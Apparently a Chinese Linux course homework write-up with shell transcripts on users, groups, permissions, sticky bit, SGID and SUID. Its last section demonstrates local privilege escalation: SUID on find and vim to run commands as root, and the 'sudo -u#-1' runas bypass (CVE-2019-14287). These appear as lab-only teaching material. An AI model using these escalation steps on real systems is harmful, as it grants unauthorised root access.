题目1
Linux 用户与组管理
-
创建一个名为bk2304 的组,组id 为2000
-
创建一个名为bk2305 的组,组id 为2001
-
创建tom 用户,指定uid 为1500,基本组为bk2304,附加组为bk2305
-
创建jerry 用户,指定uid 为1501,基本组为bk2304,附加组为bk2305
-
为tom 用户和jerry 设定密码
-
修改tom 用户的密码最长有效期为90
-
锁定jerry 用户的密码
过程
[root@gp gp]# groupadd bk2304 -g 2000
[root@gp gp]# groupadd bk2305 -g 2001
[root@gp gp]# tail -3 /etc/group
gp:x:1000:gp
bk2304:x:2000:
bk2305:x:2001:
[root@gp gp]# useradd tom -u 1500 -g bk2304 -G bk2305
[root@gp gp]# useradd jerry -u 1501 -g bk2304 -G bk2305
[root@gp gp]# passwd jerry
Changing password for user jerry.
New password:
Retype new password:
passwd: all authentication tokens updated successfully.
[root@gp gp]# passwd tom
Changing password for user tom.
New password:
BAD PASSWORD: The password fails the dictionary check - it is too simplistic/systematic
Retype new password:
passwd: all authentication tokens updated successfully.
注：上一行提示 BAD PASSWORD 但口令仍被接受，通常是因为 root 执行 passwd 时口令质量检查（pam_pwquality）只警告不拒绝。也就是说 tom 此时实际上是弱口令，真实环境中应改为符合复杂度要求的口令。
[root@gp gp]# passwd tom -x 90
Adjusting aging data for user tom.
passwd: Success
[root@gp gp]# passwd -S tom
tom PS 2023-10-07 0 90 7 -1 (Password set, SHA512 crypt.)
[root@gp gp]# passwd jerry -x 90
Adjusting aging data for user jerry.
passwd: Success
[root@gp gp]# passwd -S jerry
jerry PS 2023-10-07 0 90 7 -1 (Password set, SHA512 crypt.)
[root@gp gp]# passwd -l tom
Locking password for user tom.
passwd: Success
[root@gp gp]# passwd -l jerry
Locking password for user jerry.
passwd: Success
注：题目只要求锁定 jerry，这里连 tom 也锁了，tom 将无法用口令登录。另外 passwd -l 只是在 /etc/shadow 的口令散列前加 "!"，仅禁用口令认证；若用户配置了 SSH 公钥仍可登录，要彻底禁用账号应再配合 usermod -s /sbin/nologin 或 chage -E 0。
题目2
权限演变
-
笔记中权限演变过程,操作一遍
-
把ajest 换成自己的名字
过程
[root@gp gp]# touch /tmp/gp.txt
[root@gp gp]# ls -l /tmp/gp.txt
-rw-r--r-- 1 root root 0 Oct 7 20:57 /tmp/gp.txt
[root@gp gp]# chmod u-r /tmp/gp.txt
[root@gp gp]# ls -l /tmp/gp.txt
--w-r--r-- 1 root root 0 Oct 7 20:57 /tmp/gp.txt
[root@gp gp]# chmod u-w /tmp/gp.txt
[gp@gp ~]$ echo "666" >> /tmp/gp.txt
bash: /tmp/gp.txt: Permission denied
[root@gp gp]# mkdir /tmp/rootdir
[root@gp gp]# ls -ld /tmp/root
[gp@gp ~]$ cd /tmp/rootdir/
[gp@gp rootdir]$ echo "this is from ajest" >> gp.txt
bash: gp.txt: Permission denied
[gp@gp rootdir]$ ls -ld /tmp/rootdir/
drwxr-xr-x 2 root root 22 Oct 7 21:20 /tmp/rootdir/
[root@gp gp]# chmod o=--- /tmp/rootdir/
[gp@gp rootdir]$ ls -ld /tmp/rootdir/
drwxr-x--- 2 root root 22 Oct 7 21:20 /tmp/rootdir/
[root@gp gp]# chmod o=rwx /tmp/rootdir/
[gp@gp rootdir]$ echo "this is from gp" >> /tmp/rootdir/gp.txt
[gp@gp rootdir]$ ls /tmp/rootdir/
gp.txt root.txt
[gp@gp rootdir]$ echo "this is from gp" >> /tmp/rootdir/root.txt
bash: /tmp/rootdir/root.txt: Permission denied
[gp@gp rootdir]$ rm -rf /tmp/rootdir/root.txt
[gp@gp rootdir]$ ls /tmp/rootdir/
[gp@gp rootdir]$
说明：gp 对 root.txt 没有写权限（上一步追加被拒绝），但 rm 却成功了——删除或重命名文件取决于其所在目录的 w 和 x 权限，而前面已对 /tmp/rootdir 执行了 chmod o=rwx。这正是 /tmp 这类共享可写目录需要粘滞位的原因（见题目3）。
题目3
特殊权限位验证
-
粘滞位
-
SGID
-
SUID
过程
[tom@gp rootdir]$ mkdir /tmp/tom
[tom@gp rootdir]$ ls -ld tom
ls: cannot access tom: No such file or directory
[tom@gp rootdir]$ ls -ld /tmp/tom
drwxr-xr-x 2 tom bk2304 6 Oct 7 21:44 /tmp/tom
[tom@gp rootdir]$ chmod 777 /tmp/tom
[tom@gp rootdir]$ cd /tmp
[tom@gp tmp]$ ls -ld tom
drwxrwxrwx 2 tom bk2304 6 Oct 7 21:44 tom
[tom@gp tmp]$ cd tom
[tom@gp tom]$ echo "i am tom" > tom.txt
[tom@gp tom]$ chmod 777 tom.txt
[tom@gp tom]$ su jerry
Password:
[jerry@gp tom]$ cd /tmp/tom
[jerry@gp tom]$ echo "test" >> tom.txt
[jerry@gp tom]$ cat tom.txt
i am tom
test
[jerry@gp tom]$ rm tom.txt
重复上面步骤,切换到 tom 用户,在 tom 目录下新建 tom.txt,并写入 “i am tom”,赋予 tom.txt 最高权限,为 tom.txt 文件的父目录 tom 添加粘滞位
# Sticky-bit lab, part 2 (run as tom, cwd /tmp/tom): recreate the world-writable
# file, then set the sticky bit on its parent directory.
printf '%s\n' "i am tom" > tom.txt
chmod 777 tom.txt   # anyone may read/write the file itself ...
cd ..
chmod o+t tom       # ... but with +t on /tmp/tom only the file owner, dir owner or root may remove it
随后 jerry 无法删除 tom.txt：目录带粘滞位后，即使文件本身是 777，也只有文件属主、目录属主或 root 可以删除或重命名其中的文件（jerry 仍然可以读写它）。
# SGID lab: with the setgid bit on a directory, files created inside inherit the
# directory's group instead of the creator's primary group.
cd /tmp
mkdir gp
ls -lhd gp            # note owner, group and mode before SGID is set
su root
touch gp/test1.txt    # created by root while no SGID is set
ls -l gp              # test1.txt carries root's group
su gp                 # chmod below must be done by the directory owner (or root)
chmod g+s gp          # ls -lhd should now show an 's' in the group-execute position
su root
touch gp/test2.txt    # created by root after SGID is set
ls -l gp              # test2.txt should carry the directory's group, not root's
ls -lhd gp
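# Enumerate SUID binaries (the leading '-' in -4000 means "at least these bits").
find / -perm -4000 2>/dev/null
# or, in symbolic form. stderr must go to /dev/null — the original "2>dev/null"
# is a relative path and would try to create a file named dev/null in the cwd.
find / -perm -u=s -type f 2>/dev/null

# LAB ONLY: an SUID-root find lets ANY local user run commands as root via -exec.
# Never do this on a real system; revert after the demo with: chmod u-s /usr/bin/find
chmod u+s /usr/bin/find
ls -l /usr/bin/find          # expect an 's' in the owner-execute position
find /tmp -exec whoami \;    # run as an unprivileged user: prints "root" (effective uid)

# Same idea with vim (shell escapes such as :!sh run with euid 0; note bash drops
# euid unless started with -p, so the shell that gets spawned matters).
which vim                    # locate the vim binary
chmod u+s /usr/bin/vim
ls -l /usr/bin/vim           # verify the SUID bit on vim (not find, as the old comment said)
# revert after the demo with: chmod u-s /usr/bin/vim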
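# sudo runas-bypass lab. Lines that belong in /etc/sudoers are kept as comments
# here: they are NOT shell commands and must be entered through visudo.
#
# Syntax reminder: -u#UID runs the command as a numeric uid:
#   sudo -u#uid whoami
#
# sudoers rule (enter via visudo): gp may run whoami as any user EXCEPT root.
#   gp ALL=(ALL,!root) /usr/bin/whoami
#
# On sudo versions before 1.8.28 the !root exclusion is bypassed with uid -1
# (i.e. 4294967295), which the setresuid() call treats as "do not change" and so
# the command runs as root (widely reported as CVE-2019-14287). Patched sudo
# rejects the value instead; the result of the line below tells you which you have.
sudo -u#-1 /usr/bin/whoami

su root
visudo                       # add the rule below; never edit /etc/sudoers directly
#   gp ALL=(ALL,!root) /usr/bin/whoami,/usr/bin/id
su ggg                       # must be a user the rule covers — the rule above names gp, so this looks like a typo for gp
sudo -u root whoami          # expected: refused by the !root exclusion
sudo -u root id
sudo -u#0 whoami             # expected: refused as well (uid 0 is root)
sudo -u#0 id
sudo -u#-1 id                # root on unpatched sudo; an "unknown user id" error on patched sudo
sudo -u#-1 whoami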